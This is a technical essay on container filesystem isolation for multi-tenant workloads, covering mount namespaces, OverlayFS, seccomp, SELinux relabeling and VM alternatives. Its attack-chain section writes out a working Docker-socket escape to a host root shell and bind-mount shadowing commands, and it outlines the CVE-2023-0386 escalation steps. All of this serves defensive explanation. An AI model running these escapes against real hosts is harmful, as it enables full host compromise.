Analyzing Container Filesystem Isolation for Multi-Tenant Workloads

What follows is a dense technical analysis of container security I worked through recently. I started with a simple hypothesis: container filesystem isolation should be sufficient for multi-tenant workloads without virtual machines, provided you understand what is happening at the syscall level.

After thorough investigation, the conclusion is more uncomfortable than expected: the defaults protect you well, but the moment you reach for “advanced” features like bidirectional mount propagation or SELinux relabeling, you’re one misconfiguration away from handing an attacker the keys to your host.

Why Filesystem Isolation Matters

The Economics of Multi-Tenancy

Running multiple tenants on shared infrastructure only works if you can guarantee that Tenant A’s compromise can’t touch Tenant B. Linux namespaces provide the foundation; mount namespaces give each container its own view of the filesystem tree. Without this isolation, the cloud economics that make containers attractive fall apart.

Attack Surface Reduction

Containers restrict what a running process can see and do by leveraging kernel namespace features. But “restrict” doesn’t mean “eliminate.” The shared kernel attack surface means a vulnerability in OverlayFS (like CVE-2023-0386) can escalate privileges from inside a container that satisfies the exploit’s preconditions. The kernel is the ultimate shared resource.

The Six Pillars of Filesystem Isolation

1. Mount Namespaces & OverlayFS

Mount namespaces (CLONE_NEWNS) give each container a private view of the mount tree. OverlayFS layers a writable upperdir on top of read-only lowerdir layers, implementing copy-on-write semantics.

The copy-on-write mechanism works like this: when a container modifies a file from a lower layer, the kernel copies it to the upperdir first. All subsequent operations target this copy, leaving the base image untouched.
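
The copy-up behavior is easy to observe with a manual overlay mount. A minimal sketch, assuming root privileges; the paths under /tmp/ovl are arbitrary names for this demo:

```shell
# Build the three directories an overlay mount needs, plus a merged view.
mkdir -p /tmp/ovl/lower /tmp/ovl/upper /tmp/ovl/work /tmp/ovl/merged
echo "base image content" > /tmp/ovl/lower/app.conf

mount -t overlay overlay \
  -o lowerdir=/tmp/ovl/lower,upperdir=/tmp/ovl/upper,workdir=/tmp/ovl/work \
  /tmp/ovl/merged

ls /tmp/ovl/upper              # empty: no writes yet, so no copy-up

# Writing through the merged view triggers copy-up into the upper layer:
echo "container change" >> /tmp/ovl/merged/app.conf
ls /tmp/ovl/upper              # app.conf now lives in the writable layer
cat /tmp/ovl/lower/app.conf    # the read-only lower layer is untouched

umount /tmp/ovl/merged
```

This is the same mechanism container runtimes drive for every image layer; the exploit discussed below lives precisely in this copy-up path.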

The shared kernel problem: OverlayFS runs in kernel space. CVE-2023-0386 demonstrated a flaw in how the kernel validated UID/GID mappings when a file carrying setuid or file-capability bits was copied up from a nosuid mount into another mount. This enables local privilege escalation.

2. FUSE (Filesystem in Userspace)

FUSE lets you implement a filesystem as a userspace daemon rather than kernel code. When an application makes a syscall on a FUSE mount, the request travels: VFS → FUSE kernel module → /dev/fuse queue → userspace daemon → response back through the same path.

Why FUSE matters for containers: Kernel overlayfs mounting requires CAP_SYS_ADMIN in the relevant namespace. Where that support isn’t available or reliable, container runtimes like Podman fall back to fuse-overlayfs, which implements overlay semantics in userspace without requiring elevated privileges.
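
As a concrete example of that fallback, rootless Podman can be pointed at fuse-overlayfs explicitly. A sketch, assuming fuse-overlayfs is installed at /usr/bin/fuse-overlayfs and the per-user config file does not already contain this section:

```shell
# Tell Podman's overlay storage driver to mount via fuse-overlayfs
# (rootless Podman reads ~/.config/containers/storage.conf).
cat >> ~/.config/containers/storage.conf <<'EOF'
[storage.options.overlay]
mount_program = "/usr/bin/fuse-overlayfs"
EOF

# Verify which overlay implementation the store is using:
podman info --format '{{.Store.GraphOptions}}'
```

On kernels that support unprivileged overlayfs mounts (5.11+), Podman uses native kernel overlayfs instead and this setting is unnecessary.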

The daemon controls everything: A malicious FUSE daemon can lie about file ownership, permissions, and content. If you mount untrusted FUSE filesystems, access control is theater.

3. Mount Propagation

This is where most of us get burned. Mount propagation determines whether mount events cross namespace boundaries.

The four propagation types are:

  • Shared: mount events propagate bidirectionally between all peers in the group
  • Slave: events propagate from the master into the slave, but never back
  • Private: events don’t propagate in either direction
  • Unbindable: private, and additionally the mount cannot be bind mounted

The kernel’s protection for less-privileged namespaces: When you create a mount namespace that is less privileged than its parent - when the new namespace’s owning user namespace differs from the parent mount namespace’s owner - the kernel automatically demotes inherited shared mounts to MS_SLAVE.

This means creating a mount namespace with a different owning user namespace triggers automatic demotion. Creating one as root (without --user) does not demote - the mount stays shared.
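
Both behaviors can be observed directly with findmnt, which reports the propagation type of each mount. A sketch; the unshare invocations assume unprivileged user namespaces are enabled on the host:

```shell
# Propagation of the root mount as seen from the host:
findmnt -o TARGET,PROPAGATION /

# A mount namespace owned by a *new user namespace*: inherited shared
# mounts are demoted to slave, as described above.
unshare --user --map-root-user --mount findmnt -o TARGET,PROPAGATION /

# A mount namespace created as root *without* a new user namespace:
# no demotion, the mount stays shared.
sudo unshare --mount findmnt -o TARGET,PROPAGATION /
```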

4. MAC Enforcement (AppArmor/SELinux)

Mandatory Access Control (MAC) provides a second layer of defense. Even if a process gains capabilities, MAC policies can deny specific operations.

Docker’s default AppArmor profile (docker-default) denies mount operations except for specific allowed types.

SELinux relabeling (:z and :Z): This is where I found surprising behavior. When you run:

podman run -v /host/path:/container/path:Z myimage

The :Z option instructs the container runtime to relabel /host/path with an MCS label matching the container. This is a recursive relabel of file objects under the mount path - the runtime walks the host filesystem tree and changes the label on each file via libselinux.

This happens before the container starts, on the host. It’s not sandboxed. If you relabel a directory shared by other host services (like /var/log), you break those services. This is a host-side operation masquerading as a container configuration option.
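
On the host, the effect is roughly equivalent to a recursive chcon. A sketch, assuming an SELinux-enabled host; the MCS category pair c123,c456 is an example value, and /host/path is the mount source from the command above:

```shell
ls -Z /host/path     # labels before the container starts

# Approximately what the runtime does via libselinux for :Z --
# walk the tree and stamp every file with the container's MCS pair:
chcon -R system_u:object_r:container_file_t:s0:c123,c456 /host/path

ls -Z /host/path     # every file now carries the container-private label
```

Nothing about this is scoped to the container: any host service that previously relied on the old labels loses access.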

Critical warning: Never use :Z on:

  • Container runtime state directories (/var/lib/docker, /var/lib/containers)
  • Shared system directories (/var/log, /tmp, /var/run)
  • Directories mounted by multiple containers
  • Network filesystems (NFS, CIFS) where relabeling may fail or corrupt remote state

5. Seccomp (The Syscall Gatekeeper)

Here’s something I initially underestimated: for most container deployments, seccomp is the first line of defense against mount-based attacks, not AppArmor or SELinux. Docker and Podman’s default seccomp profiles block the mount syscall entirely for unprivileged containers.

How seccomp filtering works: When a container starts, the runtime installs a BPF (Berkeley Packet Filter) program that intercepts every syscall. The filter examines the syscall number and, optionally, its arguments, then decides: allow, deny (EPERM), kill the process, or trap to userspace.

Docker’s default seccomp profile blocks roughly 44 syscalls, including mount, kexec_load, swapoff, and pivot_root.

The practical implication: For an out-of-the-box container, mount() fails with EPERM before the kernel ever consults capabilities - the BPF filter rejects the syscall number itself. One caveat: Docker’s default profile contains capability-conditioned rules, so granting CAP_SYS_ADMIN (bad idea) re-enables mount and related syscalls in the seccomp filter; at that point a MAC policy such as the docker-default AppArmor profile is what still stands between the container and the syscall. With --security-opt seccomp=unconfined or privileged: true, the seccomp layer disappears entirely.
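
The unprivileged case is easy to see for yourself. A sketch, assuming a Docker daemon is available; alpine is just a convenient small image:

```shell
# Attempt a mount inside a default (unprivileged) container:
docker run --rm alpine sh -c 'mount -t tmpfs none /mnt; echo "exit: $?"'
# The mount call fails with "permission denied" (EPERM from the BPF
# filter), before capability checks or MAC policy ever run.
```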

6. Cgroups v2 and I/O Resource Isolation

Now, this is my other fear when it comes to multi-tenancy: filesystem operations consume shared resources. A container performing unbounded I/O can starve other containers and host services, even with perfect namespace isolation. This isn’t filesystem integrity isolation; it’s filesystem availability isolation.

The problem: By default, most container deployments don’t configure I/O limits. Containers share the host’s I/O capacity without restrictions. A malicious or misbehaving container can saturate disk I/O, causing performance degradation or outages for other containers and host services.

Why this matters for multi-tenancy: Even if your containers are perfectly isolated at the namespace and MAC level, a single container can degrade performance for everyone on the node. In shared clusters, this is a denial-of-service vector that doesn’t require any privilege escalation.
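
The mitigation is to make I/O limits explicit. A sketch; /dev/sda, the limits, and the cgroup name "mygroup" are example values for a particular host:

```shell
# Per-device write bandwidth and IOPS caps at container start:
docker run --rm \
  --device-write-bps /dev/sda:10mb \
  --device-write-iops /dev/sda:1000 \
  alpine sh -c 'echo "I/O-limited container"'

# The same limit expressed directly against the cgroup v2 interface
# (8:0 is sda's major:minor number; requires root):
echo "8:0 wbps=10485760 wiops=1000" > /sys/fs/cgroup/mygroup/io.max
```

In Kubernetes there is no first-class equivalent of io.max per pod, which is part of why this remains an opt-in, per-node concern.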

End-to-End Attack Chains

Attack Chain 1: Docker Socket Mount → Full Host Compromise

Scenario: A container has /var/run/docker.sock mounted (common for CI/CD pipelines, monitoring tools, and “Docker-in-Docker” patterns).

Preconditions:

  • Container has access to Docker socket (bind mount)
  • Docker daemon runs as root on host
  • No additional restrictions (this is the default when mounting the socket)

Step-by-step exploitation:

  1. Attacker discovers Docker socket access
  2. Creates privileged container with host filesystem mounted
  3. Reads sensitive host files (/etc/shadow, SSH keys, application secrets)
  4. Chroots into host filesystem and gets a root shell

From here they could:

  • Add SSH keys to /root/.ssh/authorized_keys
  • Create new root users in /etc/passwd
  • Install backdoors or cryptominers
  • Pivot to other systems on the network

Lesson: Never mount the Docker socket into untrusted containers. If you must, use a Docker socket proxy with API filtering.
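
For defenders who want to understand what they are exposing, the chain above collapses into very few commands. A defensive illustration, assuming curl and the docker CLI are reachable from inside the compromised container:

```shell
# Step 1: confirm the socket answers (any HTTP client over the unix socket works):
curl --unix-socket /var/run/docker.sock http://localhost/version

# Steps 2-4: one API call starts a privileged sibling container with the
# host root filesystem bind-mounted, then chroots into it:
docker -H unix:///var/run/docker.sock \
  run --rm -it --privileged -v /:/host alpine chroot /host /bin/sh
# The shell that appears is effectively a root shell on the host.
```

Access to the socket is equivalent to root on the host; API-filtering proxies only help if they block container creation with host mounts.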

Attack Chain 2: Bidirectional Mount Propagation → Host Mount Manipulation

Scenario: A container has Bidirectional mount propagation enabled (required for some CSI drivers) and CAP_SYS_ADMIN.

Preconditions:

  • Pod/container has mountPropagation: Bidirectional
  • Container has CAP_SYS_ADMIN (via privileged: true or explicit capability)
  • Seccomp allows the mount syscall (privileged: true disables seccomp entirely)
  • A shared mount exists on the host that the container can see

Step-by-step exploitation:

  1. Attacker creates a bind mount inside the container
  2. The mount propagates to the host
  3. Can shadow legitimate host content by mounting over it

Any host process reading this path sees attacker-controlled content.

Lesson: Bidirectional propagation + CAP_SYS_ADMIN = host mount control. This is why Kubernetes restricts Bidirectional to privileged pods only.
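
Inside such a container, the steps above are a handful of commands. A sketch; /host-shared is a hypothetical volume attached with mountPropagation: Bidirectional, and the shadowed content is illustrative:

```shell
# Prepare attacker-controlled content inside the container:
mkdir -p /tmp/shadow
echo 'attacker-controlled' > /tmp/shadow/config.yaml

# Bind mount over a path under the shared volume; because propagation is
# bidirectional, the new mount appears in the host's mount table too:
mount --bind /tmp/shadow /host-shared/etc-app

# Any host process resolving /host-shared/etc-app now reads /tmp/shadow.
```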

Attack Chain 3: OverlayFS CVE → Kernel Privilege Escalation

Scenario: Exploiting CVE-2023-0386 to escalate from container to host root.

Preconditions:

  • Unpatched kernel (vulnerable OverlayFS)
  • Unprivileged user namespaces enabled
  • Ability to mount OverlayFS in a user namespace
  • Mount topology with nosuid lower layer and non-nosuid upper layer

The actual exploit adds one critical component: FUSE.

  1. Create a FUSE filesystem that lies about file ownership (claims files are owned by UID 0 with SUID bit set)
  2. Use FUSE as the lower layer of an overlay mount inside a user namespace
  3. Trigger copy-up by modifying the fake SUID binary
  4. Vulnerable kernel flaw: during copy-up, the kernel didn’t verify that UID 0 in the user namespace maps to a valid UID on the host
  5. Result: a real root-owned SUID binary appears in the upper directory
  6. Execute the binary → local privilege escalation to root

Lesson: Patch your kernel. This is the only real fix.

Where My Assumptions Failed

Assumption 1: “FUSE is the primary vulnerability vector”

I went into this investigation expecting FUSE to be the primary vulnerability vector. User-kernel context switching, daemon-controlled responses, performance overhead - it all screamed “attack surface.”

What I found: FUSE’s weakness is availability (DoS) and cross-user data exposure, not host privilege escalation. A malicious FUSE daemon can hang processes, waste resources, or serve inconsistent data to different users, but it can’t directly escalate privileges to the host.

The actual weakest link is mount propagation misconfiguration. MS_SHARED mode creates a direct, bidirectional channel between container and host mount tables. Unlike FUSE, this isn’t a userspace daemon you can terminate - it’s kernel-enforced behavior that’s easy to enable and hard to notice.

Assumption 2: “SELinux relabeling is sandboxed”

I assumed :z and :Z options were container-side operations, maybe using some capability or namespace trick to relabel files from the container’s perspective.

What I found: Relabeling happens on the host, before the container starts. The container runtime recursively walks the filesystem tree and invokes SELinux relabeling via libselinux.

This means if you mount /var/log:Z into a container, you just relabeled every file in /var/log with a container-specific MCS label. Other host services reading those files may now fail with permission errors.

This isn’t a bug; it’s documented behavior. But it’s surprising if you assume container options stay inside the container.

Assumption 3: “Kernel filesystem bugs are rare”

I knew containers share the kernel, but I assumed mainline filesystem code was battle-tested enough that exploitable bugs were rare.

What I found: CVE-2023-0386 (OverlayFS) exploits the copy-up mechanism. The bug - flawed UID/GID mapping validation during file capability handling - was subtle enough to survive years of production use. CISA added it to their KEV catalog in June 2025, confirming active exploitation two years after the fix was merged.

The shared kernel isn’t a theoretical risk. It’s a practical attack vector with ongoing exploitation.

Alternatives: When Containers Aren’t Enough

The Shared Kernel Problem

The CVE-2023-0386 demonstration illustrates a fundamental constraint: containers share the host kernel, so a kernel vulnerability affects every container simultaneously. No amount of seccomp filtering, capability dropping, or MAC policy can protect against a bug in the kernel’s own filesystem implementation.

This isn’t a configuration problem I can fix. It’s an architectural boundary. The question becomes: what’s the minimum isolation primitive that eliminates this class of vulnerability?

Isolation Boundary Analysis

Each alternative interposes a different boundary between container workloads and the host kernel. The key metric is the Trusted Computing Base (TCB), the set of components that must be correct for isolation to hold.

gVisor takes a fundamentally different approach: instead of filtering syscalls, it reimplements Linux in memory-safe Go. The Sentry component is essentially a userspace kernel, handling syscalls, memory management, filesystems, networking - the works.

This dramatically shrinks the host attack surface. The Sentry needs only 53 host syscalls without networking, 68 with it. Compare that to the ~350 syscalls in Linux 5.3 - that’s an 80% reduction in host kernel exposure.

What I appreciate about the architecture is the defense-in-depth: even the Sentry runs inside seccomp-bpf, namespaces, and cgroups as secondary boundaries. Filesystem operations go through Sentry’s VFS, then to a separate Gofer process that handles host filesystem access via LISAFS.
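
Trying gVisor is low-friction if you already run Docker. A sketch, assuming runsc is installed at /usr/local/bin/runsc and daemon.json has no existing runtimes section:

```shell
# Register runsc as an alternative OCI runtime:
cat > /etc/docker/daemon.json <<'EOF'
{
  "runtimes": {
    "runsc": { "path": "/usr/local/bin/runsc" }
  }
}
EOF
systemctl restart docker

# Opt a single workload into the userspace kernel:
docker run --rm --runtime=runsc alpine dmesg
# The kernel messages come from gVisor's Sentry, not the host kernel.
```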

Firecracker takes the opposite approach: instead of reimplementing the kernel, just give each workload its own kernel. Each microVM runs a real Linux guest, so a host kernel vulnerability requires escaping KVM first - a much harder target.

Kata Containers gives you VM isolation with container UX, but the TCB varies dramatically by hypervisor choice. QEMU has nearly 2 million lines of C with decades of device emulation code - lots of attack surface.

Was My Hypothesis Correct?

My original hypothesis: “Container filesystem isolation is good enough for multi-tenant workloads without VMs, if you understand exactly what’s happening at the syscall level.”

Verdict: Partially correct, with important caveats.

Where the Defaults Hold

For trusted internal workloads, I found the default isolation model works better than I expected. Here’s why:

  1. Seccomp filtering: Docker/Podman block mount() and other dangerous syscalls by default. This is the first line of defense.
  2. Kernel behavior for less-privileged namespaces: When a container runtime creates a user namespace, inherited shared mounts are automatically demoted to slave.
  3. Runtime hardening: Most container runtimes (runc, crun, containerd) explicitly apply MS_REC|MS_SLAVE to the container’s root early in setup.
  4. MAC policies: AppArmor/SELinux provide defense-in-depth even if other layers fail.

Together, these layers mean that out-of-the-box containers from Docker, Podman, or Kubernetes have reasonable filesystem isolation without special configuration.
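
These layers can be audited with read-only commands, which is worth doing on any node whose configuration has drifted. A sketch, assuming a Docker host; output shapes vary by version:

```shell
# Which default security layers is the daemon applying?
docker info --format '{{.SecurityOptions}}'
# e.g. [name=apparmor name=seccomp,profile=builtin]

# Confirm a container really runs under a seccomp filter
# (Seccomp: 2 means SECCOMP_MODE_FILTER):
docker run --rm alpine grep Seccomp /proc/self/status
```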

Where It Breaks

For untrusted multi-tenant workloads (running other people’s code), I found gaps that can’t be configured away:

  1. Kernel bugs are game over: A single OverlayFS vulnerability can grant root to any container that satisfies the exploit’s preconditions.
  2. Configuration complexity creates risk: MS_SHARED propagation, host path mounts, privileged containers - each “advanced” feature punches holes in isolation.
  3. MAC depends on runtime integrity: CVE-2023-28642 showed that path resolution bugs in runc can bypass AppArmor.
  4. Resource isolation is opt-in: Cgroup I/O limits, storage quotas, and PID limits aren’t enabled by default.
  5. Production drifts from defaults: Teams add privileged: true to “make things work,” mount Docker sockets for CI/CD, and accumulate dangerous configurations over time.

Final Thoughts

Container filesystem isolation isn’t a wall - it’s an interlocking set of kernel mechanisms that work together to create a security boundary. Seccomp filters, capabilities, mount namespaces, OverlayFS, propagation rules, MAC policies, and cgroup resource limits - each contributes a piece.

The defaults work better than I initially expected. Seccomp blocking mount() out of the box means most mount-based attacks fail before they start. The kernel’s shared→slave demotion for less-privileged namespaces, combined with runtime hardening, provides meaningful protection.

But the power to break isolation lives in configuration options that promise convenience. Bidirectional mount propagation, host path SELinux relabeling, privileged containers, Docker socket mounts - these are documented features, not bugs. They work exactly as designed. The problem is that their design trades isolation for functionality, and production environments accumulate these trades over time.

The line between secure multi-tenancy and a compromised host is drawn where you choose to override defaults. And if you’re running truly untrusted code, consider whether containers are the right abstraction at all.

gVisor, Firecracker, and Kata exist because sometimes the answer to “is container isolation enough?” is simply “no.”
